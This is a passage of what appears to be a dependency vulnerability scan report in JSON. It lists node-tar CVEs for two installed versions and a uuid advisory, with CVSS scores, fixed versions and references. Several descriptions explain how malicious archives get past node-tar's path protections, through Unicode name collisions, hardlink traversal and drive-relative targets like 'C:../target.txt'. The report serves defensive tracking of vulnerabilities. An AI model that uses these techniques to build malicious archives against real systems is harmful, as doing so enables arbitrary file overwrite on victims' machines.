uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-176", + "CWE-352", + "CWE-367" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23950", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", + "https://www.cve.org/CVERecord?id=CVE-2026-23950" + ], + "PublishedDate": "2026-01-20T01:15:57.87Z", + "LastModifiedDate": "2026-02-18T15:50:29.91Z" + }, + { + "VulnerabilityID": "CVE-2026-24842", + "VendorIDs": [ + "GHSA-34x7-hfp2-rc4v" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a553635fa1558e6fdd3167f54f6491ae4600444f8f872f653fe2ec1cfe47f12d", + "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", + "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-24842", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", + "https://www.cve.org/CVERecord?id=CVE-2026-24842" + ], + "PublishedDate": "2026-01-28T01:16:14.947Z", + "LastModifiedDate": "2026-02-02T14:30:10.89Z" + }, + { + "VulnerabilityID": "CVE-2026-26960", + "VendorIDs": [ + "GHSA-83g3-92jg-28cx" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.8", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:069a277ef4cd3fd3765af27e3d5650fdf98c94cf19431c076990049c4b42f158", + "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", + "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26960", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", + "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", + "https://www.cve.org/CVERecord?id=CVE-2026-26960" + ], + "PublishedDate": "2026-02-20T02:16:53.883Z", + "LastModifiedDate": "2026-02-20T19:24:16.537Z" + }, + { + "VulnerabilityID": "CVE-2026-29786", + "VendorIDs": [ + "GHSA-qffp-2rhf-9h96" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:eedb592c4f0dc46dfbb54278634b1a02f3c170cc115b8591842869e7a187d674", + "Title": "node-tar: hardlink path traversal via drive-relative linkpath", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29786", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", + "https://www.cve.org/CVERecord?id=CVE-2026-29786" + ], + "PublishedDate": "2026-03-07T16:15:55.587Z", + "LastModifiedDate": "2026-03-11T21:50:01.91Z" + }, + { + "VulnerabilityID": "CVE-2026-31802", + "VendorIDs": [ + "GHSA-9ppj-qmqm-q256" + ], + "PkgID": "tar@6.2.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "InstalledVersion": "6.2.1", + "FixedVersion": "7.5.11", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a4a001e046dd48c018590362fcd2ff950ac2f0565d456beb71515996ffeee7f1", + "Title": "tar: tar: File overwrite via drive-relative symlink traversal", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31802", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", + "https://www.cve.org/CVERecord?id=CVE-2026-31802" + ], + "PublishedDate": "2026-03-10T07:44:58.02Z", + "LastModifiedDate": "2026-03-18T18:13:34.703Z" + }, + { + "VulnerabilityID": "CVE-2026-23745", + "VendorIDs": [ + "GHSA-8qq5-rm4j-mr97" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.3", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23745", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d422f6c2ae140b1980249012dabfd9c7b619a0648684a2a57d532db11e02f6df", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite and symlink poisoning via unsanitized linkpaths in archives", + "Description": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N", + "V3Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23745", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23745", + "https://www.cve.org/CVERecord?id=CVE-2026-23745" + ], + "PublishedDate": "2026-01-16T22:16:26.83Z", + "LastModifiedDate": "2026-02-18T16:20:07.823Z" + }, + { + "VulnerabilityID": "CVE-2026-23950", + "VendorIDs": [ + "GHSA-r6q2-hw4h-h46w" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.4", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-23950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f66f7d4f8f59c34e1743a65eae2ba93a294687723229e1b4bbfd56e9b1ae23c2", + "Title": "node-tar: tar: node-tar: Arbitrary file overwrite via Unicode path collision race condition", + "Description": "node-tar,a Tar for Node.js, has a race condition vulnerability in versions up to and including 7.5.3. This is due to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently. This is a Race Condition which enables Arbitrary File Overwrite. This vulnerability affects users and systems using node-tar on macOS (APFS/HFS+). Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive. The patch in version 7.5.4 updates `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`. As a workaround, users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-176", + "CWE-352", + "CWE-367" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L", + "V3Score": 8.8 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-23950", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", + "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", + "https://www.cve.org/CVERecord?id=CVE-2026-23950" + ], + "PublishedDate": "2026-01-20T01:15:57.87Z", + "LastModifiedDate": "2026-02-18T15:50:29.91Z" + }, + { + "VulnerabilityID": "CVE-2026-24842", + "VendorIDs": [ + "GHSA-34x7-hfp2-rc4v" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.7", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24842", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:300811b3c36b9566b1d65329a88d8096083e9932f7f92631612ae6ecb48a4c5b", + "Title": "node-tar: tar: node-tar: Arbitrary file creation via path traversal bypass in hardlink security check", + "Description": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", + "V3Score": 8.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-24842", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v", + "https://nvd.nist.gov/vuln/detail/CVE-2026-24842", + "https://www.cve.org/CVERecord?id=CVE-2026-24842" + ], + "PublishedDate": "2026-01-28T01:16:14.947Z", + "LastModifiedDate": "2026-02-02T14:30:10.89Z" + }, + { + "VulnerabilityID": "CVE-2026-26960", + "VendorIDs": [ + "GHSA-83g3-92jg-28cx" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.8", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26960", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:ce18f1061711bffca48c5e9df9bc6163a8eb6b9eecbe8d06eb40eb99b7b3b3da", + "Title": "node-tar: node-tar: Arbitrary file read/write via malicious archive hardlink creation", + "Description": "node-tar is a full-featured Tar for Node.js. When using default options in versions 7.5.7 and below, an attacker-controlled archive can create a hardlink inside the extraction directory that points to a file outside the extraction root, enabling arbitrary file read and write as the extracting user. Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive. This issue has been fixed in version 7.5.8.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", + "V3Score": 7.1 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-26960", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/2cb1120bcefe28d7ecc719b41441ade59c52e384", + "https://github.com/isaacs/node-tar/commit/d18e4e1f846f4ddddc153b0f536a19c050e7499f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-83g3-92jg-28cx", + "https://nvd.nist.gov/vuln/detail/CVE-2026-26960", + "https://www.cve.org/CVERecord?id=CVE-2026-26960" + ], + "PublishedDate": "2026-02-20T02:16:53.883Z", + "LastModifiedDate": "2026-02-20T19:24:16.537Z" + }, + { + "VulnerabilityID": "CVE-2026-29786", + "VendorIDs": [ + "GHSA-qffp-2rhf-9h96" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.10", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-29786", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:5a3d9bf10095d43878802a97079c17cee8b8b5613695a5380ebe47aecb3f147d", + "Title": "node-tar: hardlink path traversal via drive-relative linkpath", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.10, tar can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This issue has been patched in version 7.5.10.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22", + "CWE-59" + ], + "VendorSeverity": { + "amazon": 3, + "ghsa": 3, + "nvd": 2, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N", + "V3Score": 8.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-29786", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96", + "https://nvd.nist.gov/vuln/detail/CVE-2026-29786", + "https://www.cve.org/CVERecord?id=CVE-2026-29786" + ], + "PublishedDate": "2026-03-07T16:15:55.587Z", + "LastModifiedDate": "2026-03-11T21:50:01.91Z" + }, + { + "VulnerabilityID": "CVE-2026-31802", + "VendorIDs": [ + "GHSA-9ppj-qmqm-q256" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.11", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-31802", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:f6694db464623dae542dd3497379d66840d291e825ea2b96df7b778a3639a0bc", + "Title": "tar: tar: File overwrite via drive-relative symlink traversal", + "Description": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-22" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N", + "V40Score": 8.2 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 5.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-31802", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256", + "https://nvd.nist.gov/vuln/detail/CVE-2026-31802", + "https://www.cve.org/CVERecord?id=CVE-2026-31802" + ], + "PublishedDate": "2026-03-10T07:44:58.02Z", + "LastModifiedDate": "2026-03-18T18:13:34.703Z" + }, + { + "VulnerabilityID": "CVE-2025-64118", + "VendorIDs": [ + "GHSA-29xp-372q-xqph" + ], + "PkgID": "tar@7.5.1", + "PkgName": "tar", + "PkgIdentifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "InstalledVersion": "7.5.1", + "FixedVersion": "7.5.2", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-64118", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:d5f535d785ea18a98ecabeda2c74adfa2449081dec08c36723e9bd757947caed", + "Title": "node-tar: tar: node-tar: Information disclosure via reading a truncated tar file", + "Description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-362", + "CWE-367" + ], + "VendorSeverity": { + "ghsa": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:L/VA:L/SC:H/SI:H/SA:H", + "V40Score": 6.1 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", + "V3Score": 4.7 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-64118", + "https://github.com/isaacs/node-tar", + "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d", + "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9", + "https://github.com/isaacs/node-tar/issues/445", + "https://github.com/isaacs/node-tar/pull/446", + "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph", + "https://nvd.nist.gov/vuln/detail/CVE-2025-64118", + "https://www.cve.org/CVERecord?id=CVE-2025-64118" + ], + "PublishedDate": "2025-10-30T18:15:33.673Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "GHSA-w5hq-g745-h8pq", + "PkgID": "uuid@3.4.0", + "PkgName": "uuid", + "PkgIdentifier": { + "PURL": "pkg:npm/uuid@3.4.0", + "UID": "aa933471abfe8c0f" + }, + "InstalledVersion": "3.4.0", + "FixedVersion": "14.0.0", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-w5hq-g745-h8pq", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:fe5d7ad550c9d1842d27c2afd0ec61889c9b038d903d794223a9466c36acc4f7", + "Title": "uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided", + "Description": "### Summary\n\n`v3`, `v5`, and `v6` accept external output buffers but do not reject out-of-range writes (small `buf` or large `offset`). \nBy contrast, `v4`, `v1`, and `v7` explicitly throw `RangeError` on invalid bounds.\n\nThis inconsistency allows **silent partial writes** into caller-provided buffers.\n\n\n### Affected code\n\n- `src/v35.ts` (`v3`/`v5` path) writes `buf[offset + i]` without bounds validation.\n- `src/v6.ts` writes `buf[offset + i]` without bounds validation.\n\n### Reproducible PoC\n\n```bash\ncd /home/StrawHat/uuid\nnpm ci\nnpm run build\n\nnode --input-type=module -e \"\nimport {v4,v5,v6} from './dist-node/index.js';\nconst ns='6ba7b810-9dad-11d1-80b4-00c04fd430c8';\nfor (const [name,fn] of [\n ['v4',()=\u003ev4({},new Uint8Array(8),4)],\n ['v5',()=\u003ev5('x',ns,new Uint8Array(8),4)],\n ['v6',()=\u003ev6({},new 